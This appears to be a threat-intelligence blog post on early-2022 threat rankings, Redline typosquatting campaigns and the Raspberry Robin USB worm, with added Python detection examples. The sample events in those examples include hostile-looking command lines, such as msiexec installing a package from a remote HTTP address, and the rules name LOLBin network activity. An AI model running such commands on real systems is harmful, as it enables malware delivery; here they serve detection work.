
Intelligence Insights: March 2022

SocGholish reclaims the top spot, Redline activity is on the rise, and detections associated with Raspberry Robin increase.

The Red Canary Team

Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and plan to share a public version of it with the broader infosec community from here onward.

Highlights

As we’ve done for the past few months, we again looked at the 10 most prevalent threats encountered in the environments that Red Canary monitors. These prevalence rankings are based on the number of unique customer environments in which we observed each threat. Here’s how the numbers shook out for February 2022:

February rank   Threat name                     Percent of customers affected
1               SocGholish                      1.8%
2               Mimikatz                        1.5%
3               Impacket                        1.3%
4*              (threat name not captured)      0.9%
4*              Gootkit                         0.9%
6               Coral Crane                     0.7%
7               Remote Utilities                0.6%
⬇ 8*            (threat name not captured)      0.5%
⬇ 8*            (threat name not captured)      0.5%
8*              (threat name not captured)      0.5%
8*              CypherIT                        0.5%
8*              Bundlore                        0.5%
8*              Redline                         0.5%

⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Observations on trending threats

SocGholish reclaimed the top spot in February after a brief respite in January, when it dropped to the middle of the pack. Despite this, Red Canary did not observe any secondary payloads delivered by SocGholish last month. Several of the detections contained multiple scriptloads typical of discovery activity.
Rounding out the top 10 are several usual suspects—Mimikatz and Impacket remain in the top three, and Emotet and Qbot phishing campaigns continued to haunt inboxes. The activity cluster we recently dubbed “Coral Crane” cracked the top 10, and Raspberry Robin, another new activity cluster, just missed the rankings. You can read more about Raspberry Robin below and about Coral Crane in the February Intelligence Insights.

What are all those squiggly Redlines?

Rounding out the bottom of our top 10 list is Redline, a malware-as-a-service information stealer. Red Canary began observing an uptick in Redline activity in February due to a new campaign that abused Google Ads to deliver binaries masquerading as various Notepad replacements, such as Notepad++ and Sublime Text. In this latest campaign, Redline payloads were delivered via domains containing misspellings, such as notpaad[.]com and sublimettxt[.]com. The payloads used a known bug in Authenticode to appear as if they were legitimately signed binaries.

To thwart this bug, Microsoft provides guidance to enable strict Authenticode verification, which prevents payloads of this type from executing with invalid signatures. However, enabling this functionality may break older applications. Maintaining a strong software management process with centralized distribution of approved applications can prevent well-intentioned users from falling victim to lookalike decoys.
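One defensive control that follows from the lookalike domains named above is flagging near-miss spellings of the brands users are expected to download from. The Python below is an added example, not Red Canary's tooling: it refangs defanged domains, takes the registrable label, and reports any label within a small edit distance of a known brand label. The KNOWN_LABELS allowlist, the distance threshold and the control domains are assumptions for illustration; the two typosquats come from the post itself.

```python
from typing import Dict, Iterable, Tuple

# Constructed allowlist of brand labels users are expected to fetch editors from
# (assumption for this example; extend it with your own approved-software list).
KNOWN_LABELS = ("notepad", "notepad-plus-plus", "sublimetext")


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance: insert, delete and substitute each cost 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute (free if equal)
        prev = cur
    return prev[-1]


def registrable_label(domain: str) -> str:
    """Refang 'notpaad[.]com' -> 'notpaad.com', lower-case it and return the label
    directly left of the TLD. Multi-part suffixes such as co.uk are out of scope here."""
    host = domain.strip().lower().replace("[.]", ".").replace("(.)", ".").rstrip(".")
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def lookalike_matches(observed: Iterable[str],
                      known: Iterable[str] = KNOWN_LABELS,
                      max_distance: int = 2) -> Dict[str, Tuple[str, int]]:
    """Map each observed domain to its closest known label when it is a near miss
    (0 < distance <= max_distance). An exact match is the real brand and is not flagged."""
    flagged: Dict[str, Tuple[str, int]] = {}
    known = tuple(known)
    for dom in observed:
        label = registrable_label(dom)
        best, dist = min(((k, levenshtein(label, k)) for k in known), key=lambda kv: kv[1])
        if 0 < dist <= max_distance:
            flagged[dom] = (best, dist)
    return flagged


# Constructed sample: the two domains named in the post plus two controls.
SAMPLE_DOMAINS = ["notpaad[.]com", "sublimettxt[.]com", "sublimetext.com", "example.com"]

if __name__ == "__main__":
    for dom, (brand, dist) in lookalike_matches(SAMPLE_DOMAINS).items():
        print(f"{dom}: looks like {brand} (edit distance {dist})")
```

Run against proxy or DNS logs, a threshold of 2 on labels this short is noisy enough that hits should feed a review queue rather than an automatic block; a centrally managed software catalog, as the post recommends, removes the reason for users to type these domains at all.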

Detection opportunity: Installutil.exe making external network connections

This detection opportunity identifies activity associated with adversary tools that deliver Redline.

process == installutil.exe
&&
has_external_netconn == true


New Raspberry Robin activity cluster

As far back as January 2022, we’ve observed an uptick in detections associated with Raspberry Robin, a Red Canary activity cluster involving a worm that spreads via USB drives. This worm may appear as a shortcut (LNK file) masquerading as a legitimate folder on a USB device. Once executed, it can beacon back to a compromised QNAP storage device for command and control.
Since we began tracking this threat only recently, our analysis is ongoing and we don’t yet know the extent of its capabilities. Based on activity we’ve seen so far, organizations that rely on USB devices should be aware of this threat.

Detection opportunity: msiexec contacting a remote host over HTTP

This detection opportunity identifies the Windows Installer Tool, msiexec.exe, contacting a remote host over HTTP. Raspberry Robin uses this technique during its infection process, and this opportunity will also catch other threats that perform similar actions.

process == (msiexec.exe)
&&
process_command_line_includes == (http://, https://)
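Both detection opportunities on this page (installutil.exe making external network connections, and msiexec.exe with http:// or https:// in its command line) evaluated over constructed process events. This is an added example, not Red Canary's detection engine: the ProcessEvent shape, the field names and the sample IPs and paths are assumptions for illustration, and "external" is approximated with Python's ipaddress.is_global, which treats RFC 1918, loopback and link-local ranges as internal.

```python
import ipaddress
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple


# Constructed event shape for this example; real EDR telemetry uses its own schema.
@dataclass
class ProcessEvent:
    process: str                                   # image name or full path
    command_line: str
    remote_ips: List[str] = field(default_factory=list)  # destinations the process connected to


def image_name(event: ProcessEvent) -> str:
    """Normalise 'C:\\...\\InstallUtil.exe' to 'installutil.exe' so paths and case do not matter."""
    return event.process.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_external_netconn(event: ProcessEvent) -> bool:
    """True if any destination is publicly routable (assumption: is_global == external)."""
    for ip in event.remote_ips:
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue  # hostnames or garbage: skip rather than crash the rule
        if addr.is_global:
            return True
    return False


def rule_installutil_external(event: ProcessEvent) -> bool:
    # process == installutil.exe && has_external_netconn == true
    return image_name(event) == "installutil.exe" and has_external_netconn(event)


def rule_msiexec_http(event: ProcessEvent) -> bool:
    # process == msiexec.exe && process_command_line_includes (http://, https://)
    cl = event.command_line.lower()
    return image_name(event) == "msiexec.exe" and ("http://" in cl or "https://" in cl)


RULES: Dict[str, Callable[[ProcessEvent], bool]] = {
    "installutil_external_netconn": rule_installutil_external,
    "msiexec_http_command_line": rule_msiexec_http,
}


def evaluate(events: List[ProcessEvent]) -> List[Tuple[str, int]]:
    """Return (rule name, event index) for every rule that fires, in event order."""
    hits: List[Tuple[str, int]] = []
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, idx))
    return hits


# Constructed sample telemetry (not real detections); IPs and paths are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
                 "InstallUtil.exe /U payload.dll", ["8.8.8.8"]),              # external -> fires
    ProcessEvent("installutil.exe", "installutil.exe /U svc.dll", ["10.0.0.5"]),  # internal only
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 "msiexec.exe /q /i http://203.0.113.7/update.msi", []),       # HTTP in cmdline -> fires
    ProcessEvent("msiexec.exe", r"msiexec.exe /i C:\temp\setup.msi /qn", []),  # local package
    ProcessEvent("explorer.exe", "explorer.exe", ["8.8.8.8"]),                 # wrong process
]

if __name__ == "__main__":
    for name, idx in evaluate(SAMPLE_EVENTS):
        print(f"{name}: event {idx} ({image_name(SAMPLE_EVENTS[idx])})")
```

The second rule deliberately matches on the command line only, as the page's version does, so it will also fire on legitimate installs that pull an .msi over HTTP; pairing a hit with the parent process and the destination's reputation is the usual next step before escalating.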
